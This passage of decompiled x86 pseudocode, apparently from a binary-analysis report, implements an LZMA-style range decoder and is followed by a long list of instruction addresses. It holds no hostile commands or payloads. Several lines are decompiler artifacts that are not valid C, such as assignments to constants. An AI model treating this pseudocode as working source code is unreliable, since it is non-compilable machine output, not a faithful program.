								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                              0x00000000
                                              0x0040667f
                                              0x0040667f
                                              0x00406683
                                              0x0040673a
                                              0x0040673d
                                              0x00406749
                                              0x0040662a
                                              0x0040662a
                                              0x0040662d
                                              0x0040699f
                                              0x0040699f
                                              0x004069a2
                                              0x004069a2
                                              0x004069a8
                                              0x004069ae
                                              0x004069b4
                                              0x004069ce
                                              0x004069d1
                                              0x004069d7
                                              0x004069e2
                                              0x004069e4
                                              0x004069b6
                                              0x004069b6
                                              0x004069c5
                                              0x004069c9
                                              0x004069c9
                                              0x004069ee
                                              0x00406a15
                                              0x00406a15
                                              0x00406a1b
                                              0x00406a1b
                                              0x00000000
                                              0x004069f0
                                              0x004069f0
                                              0x004069f4
                                              0x00406ba3
                                              0x00000000
                                              0x00406ba3
                                              0x00406a00
                                              0x00406a07
                                              0x00406a0f
                                              0x00406a12
                                              0x00000000
                                              0x00406a12
                                              0x00406689
                                              0x0040668d
                                              0x00406bce
                                              0x00406bce
                                              0x00406bd1
                                              0x00406bd5
                                              0x00406bd5
                                              0x00406693
                                              0x00406699
                                              0x0040669c
                                              0x004066a0
                                              0x004066a3
                                              0x004066a7
                                              0x00406b6d
                                              0x00406bb9
                                              0x00406bc1
                                              0x00406bc8
                                              0x00406bca
                                              0x00000000
                                              0x00406bca
                                              0x004066ad
                                              0x004066b0
                                              0x004066b6
                                              0x004066b8
                                              0x004066b8
                                              0x004066bb
                                              0x004066be
                                              0x004066c1
                                              0x004066c4
                                              0x004066c7
                                              0x004066ca
                                              0x004066cb
                                              0x004066cd
                                              0x004066cd
                                              0x004066cd
                                              0x004066d0
                                              0x004066d3
                                              0x004066d6
                                              0x004066d9
                                              0x004066d9
                                              0x004066dc
                                              0x004066de
                                              0x004066de
                                              0x004066e1
                                              0x004066e1
                                              0x004066e1
                                              0x004061b7
                                              0x004061b7
                                              0x004061c0
                                              0x00000000
                                              0x00000000
                                              0x004061c6
                                              0x00000000
                                              0x004061d1
                                              0x00000000
                                              0x00000000
                                              0x004061da
                                              0x004061dd
                                              0x004061e0
                                              0x004061e4
                                              0x00000000
                                              0x00000000
                                              0x004061ea
                                              0x004061ed
                                              0x004061ef
                                              0x004061f0
                                              0x004061f3
                                              0x004061f5
                                              0x004061f6
                                              0x004061f8
                                              0x004061fb
                                              0x00406200
                                              0x00406205
                                              0x0040620e
                                              0x00406221
                                              0x00406224
                                              0x00406230
                                              0x00406258
                                              0x0040625a
                                              0x00406268
                                              0x00406268
                                              0x0040626c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040625c
                                              0x0040625c
                                              0x0040625f
                                              0x00406260
                                              0x00406260
                                              0x00000000
                                              0x0040625c
                                              0x00406236
                                              0x0040623b
                                              0x0040623b
                                              0x00406244
                                              0x0040624c
                                              0x0040624f
                                              0x00000000
                                              0x00406255
                                              0x00406255
                                              0x00000000
                                              0x00406255
                                              0x00000000
                                              0x00406272
                                              0x00406272
                                              0x00406276
                                              0x00406b22
                                              0x00000000
                                              0x00406b22
                                              0x0040627f
                                              0x0040628f
                                              0x00406292
                                              0x00406295
                                              0x00406295
                                              0x00406295
                                              0x00406298
                                              0x0040629c
                                              0x00000000
                                              0x00000000
                                              0x0040629e
                                              0x004062a4
                                              0x004062ce
                                              0x004062d4
                                              0x004062db
                                              0x00000000
                                              0x004062db
                                              0x004062aa
                                              0x004062ad
                                              0x004062b2
                                              0x004062b2
                                              0x004062bd
                                              0x004062c5
                                              0x004062c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0040630d
                                              0x00406313
                                              0x00406316
                                              0x00406323
                                              0x0040632b
                                              0x00000000
                                              0x00000000
                                              0x004062e2
                                              0x004062e2
                                              0x004062e6
                                              0x00406b31
                                              0x00000000
                                              0x00406b31
                                              0x004062f2
                                              0x004062fd
                                              0x004062fd
                                              0x004062fd
                                              0x00406300
                                              0x00406303
                                              0x00406306
                                              0x0040630b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406333
                                              0x00406335
                                              0x00406338
                                              0x004063a9
                                              0x004063ac
                                              0x004063af
                                              0x004063b6
                                              0x004063c0
                                              0x00000000
                                              0x004063c0
                                              0x0040633a
                                              0x0040633e
                                              0x00406341
                                              0x00406343
                                              0x00406346
                                              0x00406349
                                              0x0040634b
                                              0x0040634e
                                              0x00406350
                                              0x00406355
                                              0x00406358
                                              0x0040635b
                                              0x0040635f
                                              0x00406366
                                              0x00406369
                                              0x00406370
                                              0x00406374
                                              0x0040637c
                                              0x0040637c
                                              0x0040637c
                                              0x00406376
                                              0x00406376
                                              0x00406376
                                              0x0040636b
                                              0x0040636b
                                              0x0040636b
                                              0x00406380
                                              0x00406383
                                              0x004063a1
                                              0x004063a3
                                              0x00000000
                                              0x00406385
                                              0x00406385
                                              0x00406388
                                              0x0040638b
                                              0x0040638e
                                              0x00406390
                                              0x00406390
                                              0x00406390
                                              0x00406393
                                              0x00406396
                                              0x00406398
                                              0x00406399
                                              0x0040639c
                                              0x00000000
                                              0x0040639c
                                              0x00000000
                                              0x004065d2
                                              0x004065d6
                                              0x004065f4
                                              0x004065f7
                                              0x004065fe
                                              0x00406601
                                              0x00406604
                                              0x00406607
                                              0x0040660a
                                              0x0040660d
                                              0x0040660f
                                              0x00406616
                                              0x00406617
                                              0x00406619
                                              0x0040661c
                                              0x0040661f
                                              0x00406622
                                              0x00406622
                                              0x00406627
                                              0x00000000
                                              0x00406627
                                              0x004065d8
                                              0x004065db
                                              0x004065de
                                              0x004065e8
                                              0x00000000
                                              0x00000000
                                              0x0040663c
                                              0x00406640
                                              0x00406663
                                              0x00406666
                                              0x00406669
                                              0x00406673
                                              0x00406642
                                              0x00406642
                                              0x00406645
                                              0x00406648
                                              0x0040664b
                                              0x00406658
                                              0x0040665b
                                              0x0040665b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004066f0
                                              0x004066f4
                                              0x004066fb
                                              0x004066fe
                                              0x00406701
                                              0x0040670b
                                              0x00000000
                                              0x0040670b
                                              0x004066f6
                                              0x00000000
                                              0x00000000
                                              0x00406717
                                              0x0040671b
                                              0x00406722
                                              0x00406725
                                              0x00406728
                                              0x0040671d
                                              0x0040671d
                                              0x0040671d
                                              0x0040672b
                                              0x0040672e
                                              0x00406731
                                              0x00406731
                                              0x00406734
                                              0x00406737
                                              0x00000000
                                              0x00000000
                                              0x004067d7
                                              0x004067d7
                                              0x004067db
                                              0x00406b79
                                              0x00000000
                                              0x00406b79
                                              0x004067e1
                                              0x004067e4
                                              0x004067e7
                                              0x004067eb
                                              0x004067ee
                                              0x004067f4
                                              0x004067f6
                                              0x004067f6
                                              0x004067f6
                                              0x004067f9
                                              0x004067fc
                                              0x00000000
                                              0x00000000
                                              0x004063cc
                                              0x004063cc
                                              0x004063d0
                                              0x00406b3d
                                              0x00000000
                                              0x00406b3d
                                              0x004063d6
                                              0x004063d9
                                              0x004063dc
                                              0x004063e0
                                              0x004063e3
                                              0x004063e9
                                              0x004063eb
                                              0x004063eb
                                              0x004063eb
                                              0x004063ee
                                              0x004063f1
                                              0x004063f1
                                              0x004063f4
                                              0x004063f7
                                              0x00000000
                                              0x00000000
                                              0x004063fd
                                              0x00406403
                                              0x00000000
                                              0x00000000
                                              0x00406409
                                              0x00406409
                                              0x0040640d
                                              0x00406410
                                              0x00406413
                                              0x00406416
                                              0x00406419
                                              0x0040641a
                                              0x0040641d
                                              0x0040641f
                                              0x00406425
                                              0x00406428
                                              0x0040642b
                                              0x0040642e
                                              0x00406431
                                              0x00406434
                                              0x00406437
                                              0x00406453
                                              0x00406456
                                              0x00406459
                                              0x0040645c
                                              0x00406463
                                              0x00406467
                                              0x00406469
                                              0x0040646d
                                              0x00406439
                                              0x00406439
                                              0x0040643d
                                              0x00406445
                                              0x0040644a
                                              0x0040644c
                                              0x0040644e
                                              0x0040644e
                                              0x00406470
                                              0x00406477
                                              0x0040647a
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406480
                                              0x00000000
                                              0x00406485
                                              0x00406485
                                              0x00406489
                                              0x00406b49
                                              0x00000000
                                              0x00406b49
                                              0x0040648f
                                              0x00406492
                                              0x00406495
                                              0x00406499
                                              0x0040649c
                                              0x004064a2
                                              0x004064a4
                                              0x004064a4
                                              0x004064a4
                                              0x004064a7
                                              0x004064aa
                                              0x004064aa
                                              0x004064aa
                                              0x004064b0
                                              0x00000000
                                              0x00000000
                                              0x004064b2
                                              0x004064b5
                                              0x004064b8
                                              0x004064bb
                                              0x004064be
                                              0x004064c1
                                              0x004064c4
                                              0x004064c7
                                              0x004064ca
                                              0x004064cd
                                              0x004064d0
                                              0x004064e8
                                              0x004064eb
                                              0x004064ee
                                              0x004064f1
                                              0x004064f1
                                              0x004064f4
                                              0x004064f8
                                              0x004064fa
                                              0x004064d2
                                              0x004064d2
                                              0x004064da
                                              0x004064df
                                              0x004064e1
                                              0x004064e3
                                              0x004064e3
                                              0x004064fd
                                              0x00406504
                                              0x00406507
                                              0x00000000
                                              0x00406509
                                              0x00000000
                                              0x00406509
                                              0x00406507
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x0040650e
                                              0x00000000
                                              0x00000000
                                              0x00406549
                                              0x00406549
                                              0x0040654d
                                              0x00406b55
                                              0x00000000
                                              0x00406b55
                                              0x00406553
                                              0x00406556
                                              0x00406559
                                              0x0040655d
                                              0x00406560
                                              0x00406566
                                              0x00406568
                                              0x00406568
                                              0x00406568
                                              0x0040656b
                                              0x0040656e
                                              0x0040656e
                                              0x00406574
                                              0x00406512
                                              0x00406512
                                              0x00406515
                                              0x00000000
                                              0x00406515
                                              0x00406576
                                              0x00406576
                                              0x00406579
                                              0x0040657c
                                              0x0040657f
                                              0x00406582
                                              0x00406585
                                              0x00406588
                                              0x0040658b
                                              0x0040658e
                                              0x00406591
                                              0x00406594
                                              0x004065ac
                                              0x004065af
                                              0x004065b2
                                              0x004065b5
                                              0x004065b5
                                              0x004065b8
                                              0x004065bc
                                              0x004065be
                                              0x00406596
                                              0x00406596
                                              0x0040659e
                                              0x004065a3
                                              0x004065a5
                                              0x004065a7
                                              0x004065a7
                                              0x004065c1
                                              0x004065c8
                                              0x004065cb
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x004065cd
                                              0x00000000
                                              0x0040685a
                                              0x0040685a
                                              0x0040685e
                                              0x00406b85
                                              0x00000000
                                              0x00406b85
                                              0x00406864
                                              0x00406867
                                              0x0040686a
                                              0x0040686e
                                              0x00406871
                                              0x00406877
                                              0x00406879
                                              0x00406879
                                              0x00406879
                                              0x0040687c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406969
                                              0x0040696d
                                              0x0040698f
                                              0x00406992
                                              0x0040699c
                                              0x00000000
                                              0x0040699c
                                              0x0040696f
                                              0x00406972
                                              0x00406976
                                              0x00406979
                                              0x00406979
                                              0x0040697c
                                              0x00000000
                                              0x00000000
                                              0x00406a26
                                              0x00406a2a
                                              0x00406a48
                                              0x00406a48
                                              0x00406a48
                                              0x00406a4f
                                              0x00406a56
                                              0x00406a5d
                                              0x00406a5d
                                              0x00000000
                                              0x00406a5d
                                              0x00406a2c
                                              0x00406a2f
                                              0x00406a32
                                              0x00406a35
                                              0x00406a3c
                                              0x00406980
                                              0x00406980
                                              0x00406983
                                              0x00000000
                                              0x00000000
                                              0x00406b17
                                              0x00406b1a
                                              0x00000000
                                              0x00000000
                                              0x00406751
                                              0x00406753
                                              0x0040675a
                                              0x0040675b
                                              0x0040675d
                                              0x00406760
                                              0x00000000
                                              0x00000000
                                              0x00406768
                                              0x0040676b
                                              0x0040676e
                                              0x00406770
                                              0x00406772
                                              0x00406772
                                              0x00406773
                                              0x00406776
                                              0x0040677d
                                              0x00406780
                                              0x0040678e
                                              0x00000000
                                              0x00000000
                                              0x00406a64
                                              0x00406a64
                                              0x00406a67
                                              0x00406a6e
                                              0x00000000
                                              0x00000000
                                              0x00406a73
                                              0x00406a73
                                              0x00406a77
                                              0x00406baf
                                              0x00000000
                                              0x00406baf
                                              0x00406a7d
                                              0x00406a80
                                              0x00406a83
                                              0x00406a87
                                              0x00406a8a
                                              0x00406a90
                                              0x00406a92
                                              0x00406a92
                                              0x00406a92
                                              0x00406a95
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a98
                                              0x00406a9b
                                              0x00406a9b
                                              0x00406a9f
                                              0x00406aff
                                              0x00406b02
                                              0x00406b07
                                              0x00406b08
                                              0x00406b0a
                                              0x00406b0c
                                              0x00406b0f
                                              0x00000000
                                              0x00406b0f
                                              0x00406aa1
                                              0x00406aa7
                                              0x00406aaa
                                              0x00406aad
                                              0x00406ab0
                                              0x00406ab3
                                              0x00406ab6
                                              0x00406ab9
                                              0x00406abc
                                              0x00406abf
                                              0x00406ac2
                                              0x00406adb
                                              0x00406ade
                                              0x00406ae1
                                              0x00406ae4
                                              0x00406ae8
                                              0x00406aea
                                              0x00406aea
                                              0x00406aeb
                                              0x00406aee
                                              0x00406ac4
                                              0x00406ac4
                                              0x00406acc
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ad6
                                              0x00406af1
                                              0x00406af8
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406afa
                                              0x00000000
                                              0x00406796
                                              0x00406799
                                              0x004067cf
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x004068ff
                                              0x00406902
                                              0x00406902
                                              0x00406905
                                              0x00406907
                                              0x00406b91
                                              0x00000000
                                              0x00406b91
                                              0x0040690d
                                              0x00406910
                                              0x00000000
                                              0x00000000
                                              0x00406916
                                              0x0040691a
                                              0x0040691d
                                              0x0040691d
                                              0x0040691d
                                              0x00000000
                                              0x0040691d
                                              0x0040679b
                                              0x0040679d
                                              0x0040679f
                                              0x004067a1
                                              0x004067a4
                                              0x004067a5
                                              0x004067a7
                                              0x004067a9
                                              0x004067ac
                                              0x004067af
                                              0x004067c5
                                              0x004067ca
                                              0x00406802
                                              0x00406802
                                              0x00406806
                                              0x00406832
                                              0x00406834
                                              0x0040683b
                                              0x0040683e
                                              0x00406841
                                              0x00406841
                                              0x00406846
                                              0x00406846
                                              0x00406848
                                              0x0040684b
                                              0x00406852
                                              0x00406855
                                              0x00406882
                                              0x00406882
                                              0x00406885
                                              0x00406888
                                              0x004068fc
                                              0x004068fc
                                              0x004068fc
                                              0x00000000
                                              0x004068fc
                                              0x0040688a
                                              0x00406890
                                              0x00406893
                                              0x00406896
                                              0x00406899
                                              0x0040689c
                                              0x0040689f
                                              0x004068a2
                                              0x004068a5
                                              0x004068a8
                                              0x004068ab
                                              0x004068c4
                                              0x004068c6
                                              0x004068c9
                                              0x004068ca
                                              0x004068cd
                                              0x004068cf
                                              0x004068d2
                                              0x004068d4
                                              0x004068d6
                                              0x004068d9
                                              0x004068db
                                              0x004068de
                                              0x004068e2
                                              0x004068e4
                                              0x004068e4
                                              0x004068e5
                                              0x004068e8
                                              0x004068eb
                                              0x004068ad
                                              0x004068ad
                                              0x004068b5
                                              0x004068ba
                                              0x004068bc
                                              0x004068bf
                                              0x004068bf
                                              0x004068ee
                                              0x004068f5
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x0040687f
                                              0x00000000
                                              0x004068f7
                                              0x00000000
                                              0x004068f7
                                              0x004068f5
                                              0x00406808
                                              0x0040680b
                                              0x0040680d
                                              0x00406810
                                              0x00406813
                                              0x00406816
                                              0x00406818
                                              0x0040681b
                                              0x0040681e
                                              0x0040681e
                                              0x00406821
                                              0x00406821
                                              0x00406824
                                              0x0040682b
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x004067ff
                                              0x00000000
                                              0x0040682d
                                              0x00000000
                                              0x0040682d
                                              0x0040682b
                                              0x004067b1
                                              0x004067b4
                                              0x004067b6
                                              0x004067b9
                                              0x00000000
                                              0x00000000
                                              0x00406518
                                              0x00406518
                                              0x0040651c
                                              0x00406b61
                                              0x00000000
                                              0x00406b61
                                              0x00406522
                                              0x00406525
                                              0x00406528
                                              0x0040652b
                                              0x0040652e
                                              0x00406531
                                              0x00406534
                                              0x00406536
                                              0x00406539
                                              0x0040653c
                                              0x0040653f
                                              0x00406541
                                              0x00406541
                                              0x00406541
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00406920
                                              0x00406920
                                              0x00406920
                                              0x00406924
                                              0x00000000
                                              0x00000000
                                              0x0040692a
                                              0x0040692d
                                              0x00406930
                                              0x00406933
                                              0x00406935
                                              0x00406935
                                              0x00406935
                                              0x00406938
                                              0x0040693b
                                              0x0040693e
                                              0x00406941
                                              0x00406944
                                              0x00406947
                                              0x00406948
                                              0x0040694a
                                              0x0040694a
                                              0x0040694a
                                              0x0040694d
